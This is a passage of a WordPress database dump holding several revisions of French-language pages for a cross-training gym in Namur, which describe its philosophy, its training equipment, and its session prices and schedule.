Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:58:23', '2013-06-16 12:58:23', '', 5, 'http://www.crosstrainingcenter.be/?p=89', 0, 'revision', '', 0),
(102, 1, '2013-06-16 13:57:20', '2013-06-16 13:57:20', '', 'pico1', '', 'inherit', 'open', 'open', '', 'pico1', '', '', '2013-06-16 13:57:20', '2013-06-16 13:57:20', '', 5, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png', 0, 'attachment', 'image/png', 0),
(91, 1, '2013-06-16 12:58:34', '2013-06-16 12:58:34', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n\r\n&nbsp;\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 12:58:34', '2013-06-16 12:58:34', '', 5, 'http://www.crosstrainingcenter.be/?p=91', 0, 'revision', '', 0),
(291, 1, '2013-07-04 18:52:09', '2013-07-04 18:52:09', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 18:52:09', '2013-07-04 18:52:09', '', 5, 'http://www.crosstrainingcenter.be/5-revision-37/', 0, 'revision', '', 0),
(293, 1, '2013-07-04 18:53:14', '2013-07-04 18:53:14', '<h1>Assurer un entraînement de qualité :</h1>\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n<h1></h1>\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 18:53:14', '2013-07-04 18:53:14', '', 5, 'http://www.crosstrainingcenter.be/5-revision-39/', 0, 'revision', '', 0),
(93, 1, '2013-06-16 13:08:28', '2013-06-16 13:08:28', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-90 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-292x300.png\" width=\"292\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:08:28', '2013-06-16 13:08:28', '', 5, 'http://www.crosstrainingcenter.be/?p=93', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(95, 1, '2013-06-16 13:12:40', '2013-06-16 13:12:40', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-92 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-90 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-292x300.png\" width=\"292\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:12:40', '2013-06-16 13:12:40', '', 5, 'http://www.crosstrainingcenter.be/?p=95', 0, 'revision', '', 0),
(97, 1, '2013-06-16 13:19:06', '2013-06-16 13:19:06', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-94 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x82.png\" width=\"300\" height=\"82\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-90 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-292x300.png\" width=\"292\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:19:06', '2013-06-16 13:19:06', '', 5, 'http://www.crosstrainingcenter.be/?p=97', 0, 'revision', '', 0),
(99, 1, '2013-06-16 13:27:37', '2013-06-16 13:27:37', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-96 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-90 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-292x300.png\" width=\"292\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:27:37', '2013-06-16 13:27:37', '', 5, 'http://www.crosstrainingcenter.be/?p=99', 0, 'revision', '', 0),
(100, 1, '2013-06-16 13:44:39', '2013-06-16 13:44:39', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-96 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-98 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:44:39', '2013-06-16 13:44:39', '', 5, 'http://www.crosstrainingcenter.be/?p=100', 0, 'revision', '', 0),
(101, 1, '2013-06-16 11:22:47', '2013-06-16 11:22:47', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\"><img class=\"alignnone size-full wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:22:47', '2013-06-16 11:22:47', '', 22, 'http://www.crosstrainingcenter.be/?p=101', 0, 'revision', '', 0),
(105, 1, '2013-06-13 16:27:32', '2013-06-13 16:27:32', 'Nous vous  proposons chaque jour :\r\n\r\n- Team Training : entrainements en groupe avec un coach qualifié (8 à 12 pers.).\r\n\r\n- Duo Training : entrainements à deux personnes sous la supervision d’un coach.\r\n\r\n- Personal Training : un coach par personne, l’idéal pour progresser plus rapidement !\r\n- Coaching nutritionnel : rendez-vous avec une diététicienne pour améliorer votre santé.\r\n\r\n&nbsp;\r\n\r\nPrix ?\r\n\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n\r\nHoraire ?\r\n\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-13 16:27:32', '2013-06-13 16:27:32', '', 11, 'http://www.crosstrainingcenter.be/?p=105', 0, 'revision', '', 0),
